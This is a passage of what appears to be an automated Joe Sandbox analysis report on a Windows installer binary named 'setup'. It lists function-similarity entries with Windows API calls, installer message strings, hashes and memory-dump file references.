                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Destroy$Icon$PropRemoveWindow
                                                                                                    • String ID: GLFW
                                                                                                    • API String ID: 1689334242-220981224
                                                                                                    • Opcode ID: 390d2a79478637cf8201f7b0379efeaca2916fb74d4d6b98477ff41e4e8e74fe
                                                                                                    • Instruction ID: 0d4492ae1fb89e83cd794effe9959937734f8e1c0289fc88fcbe4dddacbcedfe
                                                                                                    • Opcode Fuzzy Hash: 390d2a79478637cf8201f7b0379efeaca2916fb74d4d6b98477ff41e4e8e74fe
                                                                                                    • Instruction Fuzzy Hash: 7331D4B0614701CFDB14AF78DA8871A7BF4BB41705F44486DE8858B256DBB8D894CF53
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleThread
                                                                                                    • String ID: %ls$Error$Install: swprintfInvalid path.
                                                                                                    • API String ID: 3032276028-3208929446
                                                                                                    • Opcode ID: 74ccfe04676ee88b76cbb019b9564a31302f615d17e2f9571d726185db328076
                                                                                                    • Instruction ID: 02d162b3c7a34b28d6cf165a0331c9a79f40d11c067ac0ca14cd3b7c51e340f7
                                                                                                    • Opcode Fuzzy Hash: 74ccfe04676ee88b76cbb019b9564a31302f615d17e2f9571d726185db328076
                                                                                                    • Instruction Fuzzy Hash: A021DDB4409741ABD701EFA4D58875ABBF0AB91344F418C2EE9888B244E7B8D488CF52
                                                                                                    APIs
                                                                                                    • RemovePropW.USER32 ref: 0024D394
                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,00246101,?,?,-00000004,0044EB60,0023EFEB,-00000004,00000001,0044EB60), ref: 0024D3A6
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00246101,?,?,-00000004,0044EB60,0023EFEB,-00000004,00000001,0044EB60,0023F700), ref: 0024D3C6
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00246101,?,?,-00000004,0044EB60,0023EFEB,-00000004,00000001,0044EB60,0023F700), ref: 0024D3DC
                                                                                                    • SetThreadExecutionState.KERNEL32 ref: 0024D437
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475D9
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475F5
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 00247611
                                                                                                    • SystemParametersInfoW.USER32 ref: 0024D485
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConditionDestroyMask$Icon$ExecutionInfoParametersPropRemoveStateSystemThreadWindow
                                                                                                    • String ID: GLFW
                                                                                                    • API String ID: 1778296145-220981224
                                                                                                    • Opcode ID: e61f73d150b9e6d4b9259064165978b6e7f93cf363f2937598e720c6106779d3
                                                                                                    • Instruction ID: 4f30d86b6d4132e9128f276a09845dad453960aa0731957fde0d62389ace5fad
                                                                                                    • Opcode Fuzzy Hash: e61f73d150b9e6d4b9259064165978b6e7f93cf363f2937598e720c6106779d3
                                                                                                    • Instruction Fuzzy Hash: 2B2193B16157018FDB14AF74DA8931A7BE4AF41701F05487DEC898B246EB74D898CB52
                                                                                                    APIs
                                                                                                    • PathFileExistsW.SHLWAPI ref: 001C4D77
                                                                                                    • SHCreateDirectory.SHELL32 ref: 001C4D99
                                                                                                    • GetFullPathNameW.KERNEL32 ref: 001C4DC5
                                                                                                    • GetLastError.KERNEL32 ref: 001C4EA8
                                                                                                    • MessageBoxW.USER32 ref: 001C504F
                                                                                                      • Part of subcall function 001C24F0: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C4E02), ref: 001C2512
                                                                                                      • Part of subcall function 00210260: GetModuleFileNameW.KERNEL32 ref: 002102BC
                                                                                                      • Part of subcall function 00210260: memset.MSVCRT ref: 00210369
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 002103FB
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 0021040F
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 0021041D
                                                                                                      • Part of subcall function 00210260: _wremove.MSVCRT ref: 00210471
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 00210490
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 002104A4
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 002104B2
                                                                                                      • Part of subcall function 00210260: _wremove.MSVCRT ref: 0021051C
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 0021053B
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 00210549
                                                                                                      • Part of subcall function 00210260: free.MSVCRT ref: 00210557
                                                                                                    • ShellExecuteW.SHELL32 ref: 001C509B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$FileNamePath_wremove$CreateDirectoryDiskErrorExecuteExistsFreeFullLastMessageModuleShellSpacememset
                                                                                                    • String ID: %ls$/s %ls
                                                                                                    • API String ID: 399809809-1073503050
                                                                                                    • Opcode ID: 4b0153cde11f1bbf8ffb46fb215132193cbf29732f60667e62abb2f5f9c1dcc4
                                                                                                    • Instruction ID: 6c54464c0c7ab397ac438f8876f6cbb4d716812df867081241393a8867b5c992
                                                                                                    • Opcode Fuzzy Hash: 4b0153cde11f1bbf8ffb46fb215132193cbf29732f60667e62abb2f5f9c1dcc4
                                                                                                    • Instruction Fuzzy Hash: 1E3125B05087009FD714AF25D99476FBBF0AFA0744F01882DF98887241D7B9E489CF96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Error, xrefs: 001C5CC8
                                                                                                    • InstallFinishCallback: Installation failed. Please try again., xrefs: 001C5CD0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageMutexRelease
                                                                                                    • String ID: Error$InstallFinishCallback: Installation failed. Please try again.
                                                                                                    • API String ID: 408918528-3817216040
                                                                                                    • Opcode ID: 4b9496141a226d7156e19e3988955b90b0b09c898d196a7c7818a6828c442dc5
                                                                                                    • Instruction ID: 27cd0b6997b0e70a7966baea14a4d156001f52593b0316f6669051f44eb8e912
                                                                                                    • Opcode Fuzzy Hash: 4b9496141a226d7156e19e3988955b90b0b09c898d196a7c7818a6828c442dc5
                                                                                                    • Instruction Fuzzy Hash: 98E0B6F18097009FD704AF68DA4935ABBF0BB41302F42881DE99957225D7B49098DB47
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BrowseFolderFreeFromListPathTaskUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 4093211858-0
                                                                                                    • Opcode ID: d16634dbe93d8792f1096f9b44bbb16fb03708ff42de89bb03f26b4de018881e
                                                                                                    • Instruction ID: e1ff531352cea8aaabcbea3b07f372eb90c77774805aa5d1a031696b0f8c727f
                                                                                                    • Opcode Fuzzy Hash: d16634dbe93d8792f1096f9b44bbb16fb03708ff42de89bb03f26b4de018881e
                                                                                                    • Instruction Fuzzy Hash: 3CF0DA714087018FD351AF78AA4C05DBBE0BF45342F414839E88693212DB30D558CB56
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00247F92,?,?,?,?,?,?,0023F094,-00000004,00000001), ref: 0024CBAA
                                                                                                    • UnregisterClassW.USER32 ref: 0024CBBE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassHandleModuleUnregister
                                                                                                    • String ID: GLFW30
                                                                                                    • API String ID: 2811962237-1000490103
                                                                                                    • Opcode ID: 339a5d11b98be8ee98ad8928dcbca988f4fa1625183e231ed21e71220418d09a
                                                                                                    • Instruction ID: ed2052ce76fab51e1fd54166064105b54d5e15c2c0b56dd1142bee709a82370e
                                                                                                    • Opcode Fuzzy Hash: 339a5d11b98be8ee98ad8928dcbca988f4fa1625183e231ed21e71220418d09a
                                                                                                    • Instruction Fuzzy Hash: A9C0C9F18042008FC700BFACD60A3197EF0BB01302F81456DD4C942115E7B482588B67
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$memcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3553820921-0
                                                                                                    • Opcode ID: b340eae4bddba69cf80cfaea35736dc8d992181f0efdea58967ae92123e095cc
                                                                                                    • Instruction ID: 38e2e637bd13bb995704554767b5bc28e28bd20f06c97e276f4186afe055db72
                                                                                                    • Opcode Fuzzy Hash: b340eae4bddba69cf80cfaea35736dc8d992181f0efdea58967ae92123e095cc
                                                                                                    • Instruction Fuzzy Hash: A03166B5A047059FDB10DFA4E981BA9BBE2FB8A300F25852DD9449B312E735D904CF85
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$memcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3553820921-0
                                                                                                    • Opcode ID: f36ffae7bfb8acf38b417a4a680b211b3b0f87ff4474ba7c8c9c00cc6d444e15
                                                                                                    • Instruction ID: 372619b7528b208b32b6e716983dd6a7aa64847947d7cc1bc4c3bbdde5dbe54c
                                                                                                    • Opcode Fuzzy Hash: f36ffae7bfb8acf38b417a4a680b211b3b0f87ff4474ba7c8c9c00cc6d444e15
                                                                                                    • Instruction Fuzzy Hash: 9C3112B5A00B15DFCB10DFA4E980B99BBF1BB89300F25852ED9489B312E734E915CF85
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$_cexitexitmemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 825743840-0
